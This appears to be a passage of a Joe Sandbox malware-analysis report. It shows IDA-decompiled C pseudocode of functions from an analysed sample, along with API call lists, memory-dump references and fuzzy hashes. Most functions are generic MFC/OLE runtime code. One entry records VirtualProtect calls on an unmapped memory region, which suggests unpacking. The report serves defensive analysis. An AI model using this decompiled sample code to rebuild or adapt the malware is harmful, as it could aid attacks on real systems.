                                                      • Instruction Fuzzy Hash: 00F062372012119BD7112BB65CC897BB6A8AFC5692705427AF905F2392DB389C05817D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E004064EE() {
                                                      				intOrPtr _t16;
                                                      				struct HWND__* _t19;
                                                      				intOrPtr _t23;
                                                      				intOrPtr* _t28;
                                                      				void* _t29;
                                                      
                                                      				_t28 =  *((intOrPtr*)(_t29 - 0x20));
                                                      				_t23 =  *((intOrPtr*)(_t29 - 0x24));
                                                      				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
                                                      					E0040CA8B(_t23, 1);
                                                      				}
                                                      				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
                                                      					EnableWindow( *(_t29 - 0x14), 1);
                                                      				}
                                                      				if( *(_t29 - 0x14) != 0) {
                                                      					_t19 = GetActiveWindow();
                                                      					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
                                                      					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
                                                      						SetActiveWindow( *(_t29 - 0x14));
                                                      					}
                                                      				}
                                                      				 *((intOrPtr*)( *_t28 + 0x60))();
                                                      				E00405F01(_t23, _t28, 0, _t28, _t34);
                                                      				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
                                                      					FreeResource( *(_t29 - 0x18));
                                                      				}
                                                      				_t16 =  *((intOrPtr*)(_t28 + 0x44));
                                                      				return E0041F7C2(_t16);
                                                      			}









                                                      APIs
                                                      • EnableWindow.USER32(?,00000001), ref: 0040650E
                                                      • GetActiveWindow.USER32 ref: 00406519
                                                      • SetActiveWindow.USER32(?,?,00000024,00401257,00000000,Local AppWizard-Generated Applications), ref: 00406527
                                                      • FreeResource.KERNEL32(?,?,00000024,00401257,00000000,Local AppWizard-Generated Applications), ref: 00406543
                                                        • Part of subcall function 0040CA8B: EnableWindow.USER32(?,?), ref: 0040CA98
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Window$ActiveEnable$FreeResource
                                                      • String ID:
                                                      • API String ID: 253586258-0
                                                      • Opcode ID: 2876d6dea77e8e8b7ec39ccd4b15d906bf4c1806271e33c20b36b9320a52a774
                                                      • Instruction ID: 4853af9af119085c85b499c513028b08372eaae9968efb4a3fc4ab9602832ae4
                                                      • Opcode Fuzzy Hash: 2876d6dea77e8e8b7ec39ccd4b15d906bf4c1806271e33c20b36b9320a52a774
                                                      • Instruction Fuzzy Hash: 55F04F30A00605DBCF21AF64DC455AEBBB1BF88705B55113AE503722E5C73A6D90CF69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E0041CE14(intOrPtr _a4, intOrPtr _a8) {
                                                      				long _t4;
                                                      				long _t5;
                                                      				void* _t7;
                                                      				void* _t8;
                                                      				void* _t9;
                                                      				void* _t13;
                                                      
                                                      				_t14 = _a4;
                                                      				if(_a4 == 0) {
                                                      					__eflags =  *0x446820;
                                                      					if( *0x446820 == 0) {
                                                      						_t5 = GetTickCount();
                                                      						 *0x446820 =  *0x446820 + 1;
                                                      						__eflags =  *0x446820;
                                                      						 *0x4433d8 = _t5;
                                                      					}
                                                      					_t4 = GetTickCount() -  *0x4433d8;
                                                      					__eflags = _t4 - 0xea60;
                                                      					if(_t4 > 0xea60) {
                                                      						__imp__CoFreeUnusedLibraries();
                                                      						_t4 = GetTickCount();
                                                      						 *0x4433d8 = _t4;
                                                      					}
                                                      					return _t4;
                                                      				}
                                                      				return E0041CDBD(_t7, _t8, _t9, _t13, _t14, _a8);
                                                      			}










                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 0041CE36
                                                      • GetTickCount.KERNEL32 ref: 0041CE43
                                                      • CoFreeUnusedLibraries.OLE32 ref: 0041CE52
                                                      • GetTickCount.KERNEL32 ref: 0041CE58
                                                        • Part of subcall function 0041CDBD: CoFreeUnusedLibraries.OLE32(00000000,0041CE9C,00000000), ref: 0041CE01
                                                        • Part of subcall function 0041CDBD: OleUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0041CE9C), ref: 0041CE07
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                      • String ID:
                                                      • API String ID: 685759847-0
                                                      • Opcode ID: 5235b46726404d5874cca75f6cc8b7585f8e2c9bb584c9876188f54316066500
                                                      • Instruction ID: 38eb2e71dc98f28b912332c2f41d7ff22c59e4d9a07145cfe7d16bad1c32e9e8
                                                      • Opcode Fuzzy Hash: 5235b46726404d5874cca75f6cc8b7585f8e2c9bb584c9876188f54316066500
                                                      • Instruction Fuzzy Hash: 54E0E538944324ABD750BF24EC8879A7BA0AB4AB41F114837D44096274CB7879C1CE9E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 88%
                                                      			E004169C9(intOrPtr* __ecx) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t103;
                                                      				intOrPtr* _t104;
                                                      				signed int _t106;
                                                      				signed int _t118;
                                                      				intOrPtr* _t122;
                                                      				signed int _t138;
                                                      				signed int _t146;
                                                      				void* _t149;
                                                      				signed int _t150;
                                                      				signed int _t174;
                                                      				signed int _t176;
                                                      				void* _t177;
                                                      				void* _t182;
                                                      				signed int _t184;
                                                      				void* _t185;
                                                      				void* _t187;
                                                      
                                                      				_t186 = __ecx;
                                                      				_t146 = 0;
                                                      				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
                                                      					__eflags =  *(__ecx + 0x40);
                                                      					if( *(__ecx + 0x40) == 0) {
                                                      						L9:
                                                      						_t149 = 0;
                                                      						__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
                                                      						 *(_t186 + 0x38) = _t146;
                                                      						if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
                                                      							L12:
                                                      							_t103 =  *(_t186 + 0x38);
                                                      							__eflags = _t103 - _t146;
                                                      							if(__eflags > 0) {
                                                      								_t176 = 0x30;
                                                      								_t172 = _t103 * _t176 >> 0x20;
                                                      								_t167 =  ~(__eflags > 0) | _t103 * _t176;
                                                      								 *((intOrPtr*)(_t186 + 0x3c)) = E00402EE1( ~(__eflags > 0) | _t103 * _t176, _t167);
                                                      							}
                                                      							__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
                                                      							_v12 = _t146;
                                                      							_v16 = _t146;
                                                      							if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
                                                      								L21:
                                                      								_t150 =  *(_t186 + 0x38);
                                                      								_t104 =  *((intOrPtr*)(_t186 + 8));
                                                      								 *((intOrPtr*)( *_t104 + 0x10))(_t104, _t150,  *((intOrPtr*)(_t186 + 0x3c)), _t150 << 4, _t146);
                                                      								_t106 =  *(_t186 + 0x38);
                                                      								__eflags = _t106 - _t146;
                                                      								if(__eflags != 0) {
                                                      									_t174 = 0x10;
                                                      									_t156 =  ~(__eflags > 0) | _t106 * _t174;
                                                      									 *(_t186 + 0x40) = E00402EE1( ~(__eflags > 0) | _t106 * _t174, _t156);
                                                      								}
                                                      								__eflags =  *(_t186 + 0x38) - _t146;
                                                      								if( *(_t186 + 0x38) <= _t146) {
                                                      									L26:
                                                      									E00416138(_t186);
                                                      									return  *((intOrPtr*)( *_t186 + 0x10))();
                                                      								} else {
                                                      									_t182 = 0;
                                                      									__eflags = 0;
                                                      									do {
                                                      										E0041F330(_t182,  *(_t186 + 0x40) + _t182, 0, 0x10);
                                                      										 *(_t182 +  *(_t186 + 0x40)) =  *(_t182 +  *(_t186 + 0x40)) & 0x00000000;
                                                      										_t187 = _t187 + 0xc;
                                                      										_t146 = _t146 + 1;
                                                      										_t182 = _t182 + 0x10;
                                                      										__eflags = _t146 -  *(_t186 + 0x38);
                                                      									} while (_t146 <  *(_t186 + 0x38));
                                                      									goto L26;
                                                      								}
                                                      							} else {
                                                      								_v8 = _t146;
                                                      								do {
                                                      									_t118 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x14)) + _v8 + 0x24)) + 4));
                                                      									__eflags = _t118 - _t146;
                                                      									_v20 = _t118;
                                                      									if(_t118 == _t146) {
                                                      										goto L20;
                                                      									}
                                                      									_t184 = _v12 * 0x30;
                                                      									__eflags = _t184;
                                                      									do {
                                                      										_t122 = E00406B97( &_v20);
                                                      										E00413D5B(_t172,  *((intOrPtr*)(_t186 + 0x3c)) + _t184,  *((intOrPtr*)(_t186 + 0x14)) + _v8);
                                                      										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x18) = _v12 << 4;
                                                      										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) & 0x00000000;
                                                      										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) | 0xffffffff;
                                                      										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) | 0xffffffff;
                                                      										_v12 = _v12 + 1;
                                                      										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x28)) = 1;
                                                      										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x2c)) =  *((intOrPtr*)( *_t122 + 0xa0));
                                                      										_t184 = _t184 + 0x30;
                                                      										__eflags = _v20;
                                                      									} while (_v20 != 0);
                                                      									_t146 = 0;
                                                      									__eflags = 0;
                                                      									L20:
                                                      									_v16 = _v16 + 1;
                                                      									_v8 = _v8 + 0x28;
                                                      									__eflags = _v16 -  *((intOrPtr*)(_t186 + 0x10));
                                                      								} while (_v16 <  *((intOrPtr*)(_t186 + 0x10)));
                                                      								goto L21;
                                                      							}
                                                      						}
                                                      						_t138 =  *((intOrPtr*)(_t186 + 0x14)) + 0x24;
                                                      						__eflags = _t138;
                                                      						do {
                                                      							_t177 =  *_t138;
                                                      							_t172 =  *(_t177 + 0xc);
                                                      							 *(_t186 + 0x38) =  *(_t186 + 0x38) +  *(_t177 + 0xc);
                                                      							_t149 = _t149 + 1;
                                                      							_t138 = _t138 + 0x28;
                                                      							__eflags = _t149 -  *((intOrPtr*)(_t186 + 0x10));
                                                      						} while (_t149 <  *((intOrPtr*)(_t186 + 0x10)));
                                                      						goto L12;
                                                      					}
                                                      					_t185 = 0;
                                                      					__eflags =  *(__ecx + 0x38);
                                                      					if( *(__ecx + 0x38) <= 0) {
                                                      						L8:
                                                      						 *(_t186 + 0x40) = _t146;
                                                      						goto L9;
                                                      					}
                                                      					_v12 = 0;
                                                      					do {
                                                      						__imp__#9( *(__ecx + 0x40) + _v12);
                                                      						_v12 = _v12 + 0x10;
                                                      						_t185 = _t185 + 1;
                                                      						__eflags = _t185 -  *(__ecx + 0x38);
                                                      					} while (_t185 <  *(__ecx + 0x38));
                                                      					__eflags =  *(__ecx + 0x38);
                                                      					if(__eflags > 0) {
                                                      						_push( *(__ecx + 0x40));
                                                      						E00402F0C(0, _t185, __ecx, __eflags);
                                                      						_push( *((intOrPtr*)(_t186 + 0x3c)));
                                                      						E00402F0C(0, _t185, _t186, __eflags);
                                                      					}
                                                      					goto L8;
                                                      				}
                                                      				E00416138(__ecx);
                                                      				return  *((intOrPtr*)( *__ecx + 0x10))();
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID: (
                                                      • API String ID: 1473721057-3887548279
                                                      • Opcode ID: 9e245cdb4b1b3db07f8c097b9736297f1d35a6d1de3b859328f47831a016493d
                                                      • Instruction ID: e2f1c9d16809879ff49900d9c467e20496c9c06d17cdb03baeed69f06c4bbff3
                                                      • Opcode Fuzzy Hash: 9e245cdb4b1b3db07f8c097b9736297f1d35a6d1de3b859328f47831a016493d
                                                      • Instruction Fuzzy Hash: EC517871A007019FCB64CF69CA819AAB7F1FF48314B514A2EE58397A91C774F881CB48
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 63%
                                                      			E004146F5(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                                      				signed int _v4;
                                                      				void* _v16;
                                                      				signed int _v20;
                                                      				char _v24;
                                                      				void* _v28;
                                                      				char _v36;
                                                      				intOrPtr _v44;
                                                      				intOrPtr _v48;
                                                      				intOrPtr _v56;
                                                      				char _v60;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				intOrPtr _v80;
                                                      				short _v84;
                                                      				signed int _v88;
                                                      				signed int _v92;
                                                      				short _v96;
                                                      				short _v100;
                                                      				signed int _v104;
                                                      				intOrPtr _v108;
                                                      				intOrPtr _v112;
                                                      				signed int _v116;
                                                      				intOrPtr _v120;
                                                      				char _v124;
                                                      				signed int* _t79;
                                                      				void* _t90;
                                                      				intOrPtr _t97;
                                                      				intOrPtr* _t114;
                                                      				intOrPtr* _t116;
                                                      				intOrPtr* _t118;
                                                      				signed int _t120;
                                                      				signed int _t128;
                                                      				signed int _t131;
                                                      				intOrPtr _t132;
                                                      				void* _t155;
                                                      
                                                      				_t153 = __edi;
                                                      				_push(0x70);
                                                      				E0041F6EA(E00432D8F, __ebx, __edi, __esi);
                                                      				_t155 = __ecx;
                                                      				_t79 =  *(__ecx + 0x50);
                                                      				_t128 = 0;
                                                      				_t131 = 0 | _t79 != 0x00000000;
                                                      				if(_t131 != 0) {
                                                      					_push( &_v16);
                                                      					_push(0x439440);
                                                      					_v16 = 0;
                                                      					_t131 =  *_t79;
                                                      					_push(_t79);
                                                      					_v20 = 0;
                                                      					if( *_t131() < 0) {
                                                      						L19:
                                                      						return E0041F7C2(_v20);
                                                      					} else {
                                                      						if((0 | _v16 != 0x00000000) == 0) {
                                                      							goto L4;
                                                      						} else {
                                                      							_v120 = __ecx + 0xc8;
                                                      							_v112 = __ecx + 0xd8;
                                                      							_v108 = __ecx + 0xdc;
                                                      							_v124 = 0x40;
                                                      							_v116 = 0;
                                                      							_v88 = 0;
                                                      							_v76 = 0;
                                                      							_v72 = 0;
                                                      							E0041A7E4( &_v36);
                                                      							_t97 =  *((intOrPtr*)(__ecx + 0x20));
                                                      							_v4 = 0;
                                                      							if(_t97 == 0) {
                                                      								goto L4;
                                                      							} else {
                                                      								_t153 =  *((intOrPtr*)(_t97 + 0x20));
                                                      								_v104 = 0;
                                                      								if(_t153 == 0) {
                                                      									goto L4;
                                                      								} else {
                                                      									do {
                                                      										_t31 = _t128 + 0x4369f8; // 0xfffffd3b
                                                      										 *((intOrPtr*)( *_t153 + 0x104))(_t155,  *_t31,  &_v36);
                                                      										if(_v28 != 0) {
                                                      											_t34 = _t128 + 0x4369fc; // 0x4
                                                      											_v104 = _v104 |  *_t34;
                                                      										}
                                                      										_t128 = _t128 + 8;
                                                      									} while (_t128 < 0x40);
                                                      									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd40,  &_v36);
                                                      									_v100 = _v28;
                                                      									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd43,  &_v36);
                                                      									_v96 = _v28;
                                                      									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd34,  &_v36);
                                                      									_v84 = _v28;
                                                      									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd3f,  &_v36);
                                                      									_v80 = _v28;
                                                      									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd41,  &_v36);
                                                      									_t114 = _v28;
                                                      									_push( &_v92);
                                                      									_push(0x439490);
                                                      									_push(_t114);
                                                      									if( *((intOrPtr*)( *_t114))() < 0) {
                                                      										_v92 = _v92 & 0x00000000;
                                                      									}
                                                      									_t116 = _v16;
                                                      									_push( &_v60);
                                                      									_push( &_v124);
                                                      									_v60 = 0x18;
                                                      									_push(_t116);
                                                      									if( *((intOrPtr*)( *_t116 + 0xc))() >= 0) {
                                                      										 *((intOrPtr*)(_t155 + 0x70)) = _v56;
                                                      										 *((intOrPtr*)(_t155 + 0x60)) = _v48;
                                                      										 *((intOrPtr*)(_t155 + 0x64)) = _v44;
                                                      										_v20 = 1;
                                                      									}
                                                      									_t118 = _v16;
                                                      									 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                      									_t120 = _v92;
                                                      									if(_t120 != 0) {
                                                      										 *((intOrPtr*)( *_t120 + 8))(_t120);
                                                      									}
                                                      									__imp__#9( &_v36);
                                                      									goto L19;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				} else {
                                                      					L4:
                                                      					_push(_t131);
                                                      					_t4 =  &_v24; // 0x4423e8
                                                      					_v24 = 0x442480;
                                                      					E0041F7F4(_t4, 0x43c590);
                                                      					asm("int3");
                                                      					_push(4);
                                                      					E0041F6EA(E00431BFC, _t128, _t153, _t155);
                                                      					_t132 = E0040F014(0x104);
                                                      					_v36 = _t132;
                                                      					_t90 = 0;
                                                      					_v24 = 0;
                                                      					if(_t132 != 0) {
                                                      						_t90 = E0040D519(_t132);
                                                      					}
                                                      					return E0041F7C2(_t90);
                                                      				}
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3
                                                      • String ID: @
                                                      • API String ID: 431132790-2766056989
                                                      • Opcode ID: efa78f53c0518dc018037837d0fade7883eb2ca6750ca131b4e709d9f413c559
                                                      • Instruction ID: 551150b91cef73a53ffa5b2b1fed6b209468a552cb216a3673e312414697938b
                                                      • Opcode Fuzzy Hash: efa78f53c0518dc018037837d0fade7883eb2ca6750ca131b4e709d9f413c559
                                                      • Instruction Fuzzy Hash: 7651E8B0E0020A9FDB14CFA5C884AEEB7F9BF48304F14456EE516EB290E779A945CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00402B10(void* __ebx, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				intOrPtr _v48;
                                                      				intOrPtr _v52;
                                                      				intOrPtr* _v56;
                                                      				intOrPtr* _t66;
                                                      				void* _t73;
                                                      
                                                      				_t73 = __ebx;
                                                      				_v56 = __ecx;
                                                      				if(_a8 != 0) {
                                                      					if(_a4 == 0) {
                                                      						E00401040(0x80070057);
                                                      					}
                                                      					_v32 =  *((intOrPtr*)( *_v56 - 0xc));
                                                      					_v8 = _v32;
                                                      					_v36 =  *_v56;
                                                      					_v12 = _a4 - _v36;
                                                      					_v48 =  *_v56 - 0x10;
                                                      					_v40 = 1 -  *((intOrPtr*)(_v48 + 0xc));
                                                      					_v44 =  *((intOrPtr*)(_v48 + 8)) - _a8;
                                                      					if((_v40 | _v44) < 0) {
                                                      						E00402CE0(_v56, _a8);
                                                      					}
                                                      					_v52 =  *_v56;
                                                      					_v16 = _v52;
                                                      					if(_v12 > _v8) {
                                                      						E0041F3AA(_t73, _a8, _v16, _a8, _a4, _a8);
                                                      					} else {
                                                      						E0041F425(_v16, _a8, _v16 + _v12, _a8);
                                                      					}
                                                      					if(_a8 < 0 || _a8 >  *((intOrPtr*)( *_v56 - 8))) {
                                                      						E00401040(0x80070057);
                                                      					}
                                                      					 *((intOrPtr*)( *_v56 - 0xc)) = _a8;
                                                      					_t66 = _v56;
                                                      					 *((char*)( *_t66 + _a8)) = 0;
                                                      					return _t66;
                                                      				}
                                                      				return E00402C20(_v56);
                                                      			}


                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: _memmove_s
                                                      • String ID: ~hW
                                                      • API String ID: 800865076-4279806109
                                                      • Opcode ID: 931fb6340859c89c402a8088c38bd7c54ab9a0b71192c09071587e71d5b65f94
                                                      • Instruction ID: 102a0ea3eca27aeed369f946151bd1db1440c8230f948bad12f4f6323d19a1f9
                                                      • Opcode Fuzzy Hash: 931fb6340859c89c402a8088c38bd7c54ab9a0b71192c09071587e71d5b65f94
                                                      • Instruction Fuzzy Hash: 7B41E578A01108EFCB04DF99D58499EB7B2FF88310F20C15AE919AB395C735AE41CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 46%
                                                      			E0041C01D(void* __ecx) {
                                                      				signed short* _t33;
                                                      				void* _t35;
                                                      				void* _t40;
                                                      				void* _t43;
                                                      				signed short _t46;
                                                      				intOrPtr _t47;
                                                      				void* _t48;
                                                      				signed short _t50;
                                                      				signed int _t52;
                                                      				void* _t53;
                                                      				intOrPtr _t54;
                                                      				void* _t55;
                                                      
                                                      				_t48 = __ecx;
                                                      				_t54 =  *((intOrPtr*)(_t55 + 0x14));
                                                      				_t53 = 0;
                                                      				if( *((intOrPtr*)(_t54 + 8)) > 0) {
                                                      					_t47 =  *((intOrPtr*)(_t55 - 0x1c));
                                                      					do {
                                                      						__imp__#9(_t47);
                                                      						_t53 = _t53 + 1;
                                                      						_t47 = _t47 + 0x10;
                                                      					} while (_t53 <  *((intOrPtr*)(_t54 + 8)));
                                                      				}
                                                      				E0041F7F4(0, 0);
                                                      				E0041B9A1(_t48);
                                                      				_t33 =  *(_t55 + 0x10);
                                                      				if(_t33 == 0) {
                                                      					_t35 = ( *(_t55 - 0x24) & 0x0000ffff) - 8;
                                                      					if(_t35 == 0) {
                                                      						__imp__#6(_t46);
                                                      					} else {
                                                      						_t40 = _t35 - 1;
                                                      						if(_t40 == 0) {
                                                      							L19:
                                                      							if(_t46 != 0) {
                                                      								 *((intOrPtr*)( *_t46 + 8))(_t46);
                                                      							}
                                                      						} else {
                                                      							_t43 = _t40 - 3;
                                                      							if(_t43 == 0) {
                                                      								__imp__#9(_t55 - 0x44);
                                                      							} else {
                                                      								if(_t43 == 1) {
                                                      									goto L19;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				} else {
                                                      					_t50 =  *(_t55 - 0x24);
                                                      					 *_t33 = _t50;
                                                      					_t52 = (_t50 & 0x0000ffff) + 0xfffffffe;
                                                      					if(_t52 <= 0x13) {
                                                      						switch( *((intOrPtr*)(_t52 * 4 +  &M0041C107))) {
                                                      							case 0:
                                                      								L12:
                                                      								 *(__eax + 8) = __bx;
                                                      								goto L23;
                                                      							case 1:
                                                      								 *(__eax + 8) = __ebx;
                                                      								goto L23;
                                                      							case 2:
                                                      								 *(__eax + 8) =  *(__ebp - 0x44);
                                                      								goto L23;
                                                      							case 3:
                                                      								 *(__eax + 8) =  *(__ebp - 0x44);
                                                      								goto L23;
                                                      							case 4:
                                                      								__ecx =  *(__ebp - 0x44);
                                                      								 *(__eax + 8) =  *(__ebp - 0x44);
                                                      								__ecx =  *(__ebp - 0x40);
                                                      								 *(__eax + 0xc) = __ecx;
                                                      								goto L23;
                                                      							case 5:
                                                      								__bx =  ~__bx;
                                                      								asm("sbb ebx, ebx");
                                                      								goto L12;
                                                      							case 6:
                                                      								__esi = __ebp - 0x44;
                                                      								__edi = __eax;
                                                      								asm("movsd");
                                                      								asm("movsd");
                                                      								asm("movsd");
                                                      								asm("movsd");
                                                      								goto L23;
                                                      							case 7:
                                                      								goto L23;
                                                      							case 8:
                                                      								_t33[4] = _t46;
                                                      								goto L23;
                                                      						}
                                                      					}
                                                      				}
                                                      				L23:
                                                      				 *(_t55 - 4) = 0;
                                                      				E0041B9F7(_t55 - 0x58);
                                                      				 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
                                                      				if( *((intOrPtr*)(_t55 - 0x2c)) != 0) {
                                                      					_push( *((intOrPtr*)(_t55 - 0x30)));
                                                      					_push(0);
                                                      					E0040D3B7();
                                                      				}
                                                      				return E0041F7E5(_t46, _t53, _t54);
                                                      			}


                                                      APIs
                                                      • VariantClear.OLEAUT32(?), ref: 0041C02B
                                                      • __CxxThrowException@8.LIBCMT ref: 0041C03E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: ClearException@8ThrowVariant
                                                      • String ID: XpC
                                                      • API String ID: 3645285410-1560596422
                                                      • Opcode ID: c6d49d499b5d8eaa98cd637276b1d5e44ea3e0b00cd18839773f064d833eb071
                                                      • Instruction ID: d9f4d4b0c6ef5e2124660a129b9ddfcdd11f384d2037844c7c04da0540221948
                                                      • Opcode Fuzzy Hash: c6d49d499b5d8eaa98cd637276b1d5e44ea3e0b00cd18839773f064d833eb071
                                                      • Instruction Fuzzy Hash: 08218E30984208CFCB10DFE5CCC46EDBBB1FF49310F25815AD55A272A1C7396A8ADB5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 022E2468
                                                      • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 022E24B2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.615064004.00000000022E1000.00000020.00000001.sdmp, Offset: 022E1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_22e1000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID: @
                                                      • API String ID: 544645111-2766056989
                                                      • Opcode ID: b0ed06b0904b7b5d349e43da5bb46151d78503066fe4eb38dd6de6c737d05048
                                                      • Instruction ID: 92ed9fdc69547ca25d068f88ee40974eb0216de1eed6941f7a5aa98db7ce6d50
                                                      • Opcode Fuzzy Hash: b0ed06b0904b7b5d349e43da5bb46151d78503066fe4eb38dd6de6c737d05048
